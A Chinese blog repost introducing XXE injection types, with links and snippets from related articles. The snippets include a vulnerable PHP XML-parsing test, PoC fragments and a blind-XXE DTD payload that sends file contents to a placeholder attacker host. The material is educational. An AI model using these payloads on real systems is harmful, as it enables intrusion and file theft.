XXE 漏洞基本的了解

最新推荐文章于 2021-05-16 22:39:36 发布
最新推荐文章于 2021-05-16 22:39:36 发布
阅读量585 收藏
点赞数
原文链接:http://www.cnblogs.com/H-hy/p/11581357.html
版权

XXE 注入

在开始之前,先认识一下,最常见的XXE漏洞类型,这样有助于攻击并创造最终正确的 POC:

  1.基础的 XXE 注入——外部实体注入本地 DTD。

  2.基于盲注的 XXE 注入—— XML 解析器在响应中不显示任何错误。

  3.基于错误的 XXE 注入——成功解析之后,XML 解析器始终显示 SAME 响应。即“你的消息已被接收”,因此,我们可能希望解析器将文件的内容 打印 到错误响应中。

XXE是一个非常强大的攻击,它允许我们操纵错误的XML解析器并利用它们。请注意,有更多的技术和攻击利用方式可以通过XXE注入完成。如前所述,每个解析器都有不同的能力,因此我们可以提出不同的漏洞;;

 

看了一张相关的文章所以知道了 XXE 漏洞攻击;

https://www.secpulse.com/archives/58915.html

还有一个下载的实验;https://appsec-labs.com/portal/wp-content/uploads/2016/09/XXE-demo-try-it-onyourself.rar

这个文章有一个原文链接:https://appsec-labs.com/portal/xxe-attacking-guide/

 

看了几个 XXE 漏洞很多文章都是在2016 2017 的;过后做一下这个 XXE 漏洞实验;

 

看了一个内网大杀器利用:CVE - 2019 - 1024 漏洞 

链接如下:

https://msd.misuland.com/pd/3255817997595445898

 

学习一下 

 

转载于:https://www.cnblogs.com/H-hy/p/11581357.html

weixin_30916125
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第四节 XXE漏洞利用 - 任意文件读取-01
09-15
在开始学习XXE漏洞利用之前,我们需要了解基本的测试代码。下面是一个简单的PHP测试代码: ```php $xml=file_get_contents("php://input"); $data = simplexml_load_string($xml) ; echo "<pre>" ; print_r($data)...
安全测试 - 第二课之XXE 漏洞
撒忆雨
07-23 417
英文简称:XXE 英文全称:XML Extension Entity Injection 中文全称:XML 外部实体注入 XML是⼀种⾮常流⾏的标记语⾔。它⽤于配置⽂件,⽂档格式(如OOXML,ODF,PDF,RSS,…),图像格式(SVG, EXIF标题)和⽹络协议(WebDAV,CalDAV,XMLRPC,SOAP,XMPP,SAML, XACML,…) 常⻅的xml注⼊攻击如下所示: 攻击原理主要是: 在解析外部实体的过程中,XML解析器可以根据URL中指定的⽅案(协议)来查询各种⽹络协议和服务(D
Poc初探之XXE
04-18 514
用bwapp的例子简单回顾下xxe漏洞:通过在xml外部实体附带非法参数,实现非法操作。如下图: POC编写思路:针对漏洞页面,发送带相应非法参数的包。人生苦短,下面用Python 的urllib2模块演示。 1 #! /usr/bin/python 2 # coding=utf-8 3 # __author__='Dou—wei' ...
xxe漏洞靶机编写poc和exp
rlenew的博客
11-25 1103
主机地址:172.16.131.85 靶机地址:192.168.6.211 (这里不再对xxe漏洞进行讲解,自行百度。主要分为两类有回显xxe和无回显xxe) 直接访问靶机地址 利用dirb扫描得到了xxe和admin.php页面,访问xxe 抓包进行测试 因为已经是xxe靶机了,所以直接开始编写poc代码。poc的主要代码段为 def poc(url): payload = '<?xml version="1.0" encoding="UTF-8"?>\n' payload
CTF--web学习
qq_45655136的博客
01-08 7713
这是大二上学期主要学习的一些知识,分享一下 一、linux常见命令 Linux切换到超级管理员 sudo su 切换到普通用户 su username touch创建文件 mkdir创建文件夹 mkdir -p ./aaa/bbb/ccc创建aaa/bbb/ccc目录 mv 既可以重命名,又可以移动文件或文件夹 rm -r就是向下递归,不管有多少级目录,一并删除 ​ -f就是直接删除,不作任何提示的 cp拷贝 pwd查看当前目录 ‘>’ '>>'将命令执行结果重定向
XXE(外部实体注入漏洞)
dinghuan2011的专栏
09-11 3891
版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/zhangxing52077/article/details/80932730 1.场景还原    近日,微信发来警告通知,告知平台微信支付可能存在XXE(外部实体注入漏洞),笔者根据微信官方技术文档及时修复了该漏洞,分享出来希望能够对大伙有所帮助 2.原因分析   所谓的外部实体注入漏洞,主...
第85天:CTF夺旗-JAVA考点反编译&XXE&反序列化1
08-03
例如,网鼎杯2020年的题目中就涉及到利用XXE漏洞来读取服务器上的文件,进一步找到Flag。 总结来说,理解并掌握Java反编译、XXE攻击、反序列化漏洞以及文件安全是提升网络安全技能的重要一环,对于CTF选手和开发...
漏洞赏金职业生涯.pdf
10-06
【网络安全渗透测试漏洞】与【漏洞赏金职业生涯】是网络安全领域的关键话题,主要涉及的是发现、报告和修复软件系统中的安全漏洞,以及以此为职业的“Bug Bounty Hunter”(漏洞赏金猎人)的成长路径。以下是对这些...
xxe-injection-payload-list::bullseye:XML外部实体(XXE)注入有效负载列表
02-06
下面将详细阐述XXE漏洞的工作原理、危害、常见利用方式以及防范措施。 **一、工作原理** XML是用于数据交换的标准格式,它支持外部实体引用,可以链接到外部文件或网络资源。当一个应用不加限制地解析包含外部实体...
YourNextBugTip:Twitter Bug赏金技巧和窍门的集合
02-06
综上所述,"YourNextBugTip"资源集合为安全研究人员提供了多方面的指导,涵盖了从基本概念到高级技巧的各种话题,帮助他们在Twitter的Bug赏金计划中找到并报告安全漏洞。通过学习和实践这些技巧,参与者可以提高自己...
XXE注入
a3320315的博客
10-28 545
0x01 贴出源地址 Blind XXE详解与Google CTF一道题分析 0x02 贴出常用payload 一、Blind XXE 1、外部DTD (1)先在自己的服务器中加入下列DTD文件 xml.dtd <!ENTITY % start "<!ENTITY &#x25; send SYSTEM 'http://myip:10001/?%file;'>"...
初识XXE漏洞
热门推荐
Websec
03-22 1万+
0X01:何为XXE漏洞XXE是指xml外部实体攻击0x02:那么xml是什么?xml实体攻击是什么?XML百度是这样子的:可扩展标记语言,标准通用标记语言的子集,是一种用于标记电子文件使其具有结构性的标记语言。在电子计算机中,标记指计算机所能理解的信息符号,通过此种标记,计算机之间可以处理包含各种的信息比如文章等。它可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言...
深入理解漏洞XXE 漏洞
weixin_50464560的博客
05-16 1134
介绍 XXE 之前,我先来说一下普通的 XML 注入,这个的利用面比较狭窄,如果有的话应该也是逻辑漏洞 如图所示: 既然能插入 XML 代码,那我们肯定不能善罢甘休,我们需要更多,于是出现了 XXE XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是什么?XML外部实体。(看到这里肯定有人要说:你这不是在废话),固然,其实我这里废话只是想强调我们的利用点是 外部实体 ,也是提醒读者将注意力集中于外部实体中,而不要
PortSwigger Academy | XML external entity (XXE) injection : XML外部实体注入
水榭山寺花烂漫,凤凰集外雁归来。敢与云峰争秀色,妙雨莲花九重开。
02-01 929
文章目录什么是XML外部实体注入?XXE漏洞如何产生?XML实体什么是XML?什么是XML实体?什么是文件类型定义?什么是XML自定义实体?什么是XML外部实体?XXE攻击有哪些类型? 在本节中,我们将解释什么是XML外部实体注入,描述一些常见的示例,解释如何发现和利用各种XXE注入,并总结如何防止XXE注入攻击。 什么是XML外部实体注入? XML外部实体注入(也称为XXE)是一个网络安全漏洞,它使攻击者能够干扰应用程序对XML数据的处理。 它通常使攻击者可以查看应用程序服务器文件系统上的文件,并与应用程
XML 是什么
笔记
02-19 226
一、初识XML: 1.基本概念: XML 的英文全称为:Extensible Markup Language 可扩展标记语言 可扩展:标签都是自定义的。 *功能 *存储数据, 1.配置文件 2.在网络中传输 * xml与html的区别 1. xml标签都是自定义的,html 标签是预定义。 2. xml的语法严格,html 语法松散 3. xml是存储数据的,html是展示数据 w3C ...
XXE blind 简单poc & 读文件
3569
03-27 3127
原理简介: https://blog.csdn.net/u011721501/article/details/43775691 首先你要确定是xml格式的数据,content-type是xml,PHP和JAVA利用有点不一样 PHP 利用方式 读取文件POC 利用: 自己vps放置 xxe.xml <!ENTITY % payload SYSTEM "php://fil...
基于springcloud微服务开发平台
最新发布
07-22
采用前后端分离的模式,前端开源两个框架:Sword (基于 React、Ant Design)、Saber (基于 Vue、Element-UI) 后端采用SpringCloud全家桶,并同时对其基础组件做了高度的封装,单独开源出一个框架:BladeTool BladeTool已推送至Maven中央库,直接引入即可,减少了工程的臃肿,也可更注重于业务开发 集成Sentinel从流量控制、熔断降级、系统负载等多个维度保护服务的稳定性。 注册中心、配置中心选型Nacos,为工程瘦身的同时加强各模块之间的联动。 极简封装了多租户底层,用更少的代码换来拓展性更强的SaaS多租户系统。 借鉴OAuth2,自研多终端认证系统,可控制子系统的token权限互相隔离。 借鉴Security,自研Secure模块,采用JWT做Token认证,可拓展集成Redis等细颗粒度控制方案。 稳定生产了六年,经历了从 Camden -> Hoxton -> 2023 的技术架构,也经历了从fat jar -> docker -> k8s + jenkins的部署架构。 项目分包明确,规范微服务的开发模式,使包与包
毕业设计javajsp诗歌诗词网站sqlserver-qr源码含文档工具包
07-22
毕业设计javajsp诗歌诗词网站sqlserver-qr源码含文档工具包 页面是jsp,数据库sqlserver,jdk1.8,开发工具用ecplise、myecplise、sts、idea都可以 诗韵人间网站 系统管理 修改密码 年代管理 年代录入 诗词管理 诗词录入 诗词搜索 留言板 包含:源码、数据库脚本、论文、答辩ppt、开题报告、环境工具包、相同框架项目的安装教程(在说明文档中)
geoserver xxe漏洞
09-02
Geoserver是一个开源的地理信息系统(GIS)软件,它用于发布和共享地理数据和服务。然而,Geoserver在某些情况下可能存在一个称为XXE(XML外部实体)漏洞XXE漏洞是一种安全漏洞,攻击者可以利用该漏洞来读取本地或远程服务器上的文件。这种漏洞通常是由于应用程序在处理XML输入时,对外部实体的处理不当而引起的。 具体到Geoserver的XXE漏洞,它可能会受到XML实体注入攻击。攻击者可以通过向Geoserver发送包含恶意XML实体引用的请求,来读取系统上的敏感文件或执行任意代码。 为了防止Geoserver XXE漏洞的利用,有几个关键的步骤可以采取: 1. 更新Geoserver:确保您使用的是最新版本的Geoserver。开源软件的维护者通常会修复已知的漏洞,并在新版本中发布修复程序。 2. 安全的配置文件处理:确保Geoserver的配置文件中没有不必要的文件,因为攻击者可能会利用这些文件访问敏感信息。 3. 过滤和验证用户输入:在输入和输出时,对用户提交的XML数据进行充分验证和过滤。这将有助于防止输入的恶意XML实体被执行。 4. 强化安全意识:向Geoserver用户和管理员提供适当的培训,以提高他们对安全问题的意识。这将有助于减少社会工程学攻击和恶意操作。 总之,Geoserver XXE漏洞是一种可以利用的安全漏洞,但通过更新软件、安全配置文件处理、过滤验证用户输入和提高安全意识,可以有效地减少这种漏洞的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值